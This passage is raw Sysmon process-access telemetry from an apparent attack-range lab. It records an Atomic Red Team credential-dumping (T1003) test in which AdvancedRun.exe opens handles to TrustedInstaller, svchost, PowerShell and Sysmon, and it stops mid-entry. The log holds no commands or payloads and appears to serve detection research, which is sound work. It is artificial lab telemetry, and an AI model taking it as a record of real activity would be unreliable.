17:28:56.559{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003953235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003953234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953231Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED58-61EA-7E03-000000002702}4936C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003953228Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED58-61EA-7F03-000000002702}5528C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953224Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-ED47-61EA-7A03-000000002702}5868C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953223Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953222Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953221Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953219Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.559{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C